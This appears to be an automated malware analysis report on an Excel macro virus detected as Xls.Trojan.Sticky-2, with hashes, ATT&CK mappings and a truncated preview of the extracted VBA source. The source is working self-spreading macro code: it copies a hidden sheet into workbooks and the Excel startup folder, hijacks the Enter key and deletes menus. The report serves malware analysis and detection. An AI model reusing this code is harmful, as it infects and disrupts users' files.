Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b9c6bc7d0c5cf4b…

MALICIOUS

Office (OLE)

91.0 KB Created: 1999-03-09 07:55:37 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d3035d9d521e91ea90f313384ab1e409 SHA-1: 399c968a25ad2b0ecc7932090e4c32c0ba12bba9 SHA-256: 0b9c6bc7d0c5cf4b5ce654083f9718e7eb7ca4fb0ba3afa33adf6a51a2babf67
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing a VBA macro, specifically an Auto_Open macro, which is a common technique for initial execution. The macro attempts to modify Excel's user interface by calling menu and button functions, suggesting it's designed to hide malicious activity or facilitate further execution. The ClamAV detection as 'Xls.Trojan.Sticky-2' strongly indicates malicious intent, likely involving the download of a secondary payload.

Heuristics 3

  • ClamAV: Xls.Trojan.Sticky-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Sticky-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18525 bytes
SHA-256: dbc1c5b19046ff2e49b09ff72d8dbbd5c9006e5bf2cb8ccef7b740f57a61da1e
Detection
ClamAV: Xls.Trojan.Sticky-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sticky"

Dim cBook As String
Dim EdtOk, mnDltd As Boolean
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Erhdl
    EdtOk = True
    With Application
        .EnableCancelKey = xlDisabled
        .DisplayAlerts = False
        .ScreenUpdating = False
        If ThisWorkbook.Name = "TNT.xls" Then Workbooks.Add
        meExist = False
        For Each b In Workbooks
            If UCase(b.Name) = "TNT.XLS" Then meExist = True
        Next
        If meExist = False Then GoSub TNTMake
        .OnKey "~", "'TNT.xls'!myAction"
        .OnSheetActivate = "TNT.xls!Sticky.meCopy"
    End With
delMnus:
    mnDltd = False
    Call mnu(3, 1, 6, "&U")
    If mnDltd Then Exit Sub
    Call mnu(3, 1, 4, "&M")
    Call mnu(7, 3, 3, "&T")
    Call mnu(7, 5, 4, "&h")
    Call mnu(7, 6, 15, "&n")
    Call mnu(7, 6, 14, "&n")
    Call mnu(7, 6, 13, "&M")
    Call mnu(7, 6, 12, "&M")
    Call mnu(7, 8, 4, "&U")
    Call mnu(8, 3, 3, "&T")
    Call mnu(8, 5, 2, "&h")
    Call mnu(8, 6, 10, "&n")
    Call mnu(8, 6, 8, "&M")
    Call mnu(8, 7, 4, "&U")
    Call mnu(9, 2, 11, "&S")
    Call mnu(9, 3, 3, "&T")
    Call mnu(9, 5, 5, "&I")
    Call mnu(9, 5, 1, "&t")
    Call mnu(9, 6, 14, "&d")
    Call mnu(9, 6, 10, "&M")
    Call mnu(9, 7, 4, "&U") 'next
    Call shrtMn(1, 11)
    Call shrtMn(1, 10)
    Call shrtMn(2, 6)
    Call shrtMn(9, 7)
    Call shrtMn(14, 13)
    Call shrtMn(15, 12)
    Call shrtMn(16, 12) 'next
    Call Bttn(5, 15)
    Call Bttn(7, 5)
    Call Bttn(9, 3)
    Call Bttn(9, 4)
    Call Bttn(9, 6)
    Call Bttn(9, 7)
    Call Bttn(9, 15)
    Exit Sub
TNTMake:
    Workbooks("TNT.xls").Close
    With Application
        n = .SheetsInNewWorkbook
        .SheetsInNewWorkbook = 1
        Workbooks.Add
        .SheetsInNewWorkbook = n
        ThisWorkbook.Sheets("Sticky").Copy Before:=ActiveSheet
        Set cS = ActiveSheet
        cS.OnSheetActivate = "meHide"
        cS.Visible = False
    End With
    s = Application.StartupPath
    Kill s & "\TNT.xls"
    ActiveWorkbook.SaveAs Filename:=s & "\TNT.xls"
    ActiveWindow.Visible = False
    Workbooks("TNT.xls").Close savechanges:=True
    Workbooks.Open Filename:=s & "\TNT.xls"
    Return
Erhdl:
    Resume Next
End Sub
Sub meCopy()
Attribute meCopy.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Erhdl
    With Application
        .EnableCancelKey = xlDisabled
        .ScreenUpdating = False
        .DisplayAlerts = False
        .OnKey "~", "'TNT.xls'!myAction"
    End With
    cDrv = Left(CurDir(), 1)
    With ActiveWorkbook
        If ActiveSheet.Name = "Sticky" Then ActiveSheet.Visible = False
        If UCase(Left(.Name, 4)) = "BOOK" Then
            If EdtOk Or EdtOk = "" Then Exit Sub
        End If
        For Each sh In .Sheets
            If sh.Name = "Sticky" Then Exit Sub
        Next
        ThisWorkbook.Sheets("Sticky").Copy Before:=ActiveSheet
        Set cS = ActiveSheet
        cS.OnSheetActivate = "meHide"
        cS.Visible = False
        If UCase(Left(.Name, 8)) = "DATABASE" Then
            cS.Unprotect password:="Project"
            cS.Protect password:="" & Second(Time) / 11
        End If
        If UCase(Left(.Name, 4)) <> "BOOK" And cDrv <> "A" Then .Save
    End With
    Exit Sub
Erhdl:
    Resume Next
End Sub
Sub myAction()
Attribute myAction.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo Ex
    cBook = ActiveWorkbook.Name
    With Application
        .EnableCancelKey = xlDisabled
        EdtOk = False
        .SendKeys "{DOWN}"
        meCopy
        .OnKey "~"
        If Now < DateValue("May 1, 1998") Or WeekDay(Now) <> 7 Or _
            Time < TimeValue("11:59:59 AM") Then GoTo Ex
        EnableEdt
        EdtOk = True
        .OnKey "~", "'TNT.xls'!myAction"
        MsgBox "Please stop for a while to get relaxed!", 0 + 48, "TNT"
        .OnTime Now + TimeValue("00:00:10"), "'TNT.xls'!EnableEdt"
    End With
Ex:
    EdtOk = True
End Sub
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.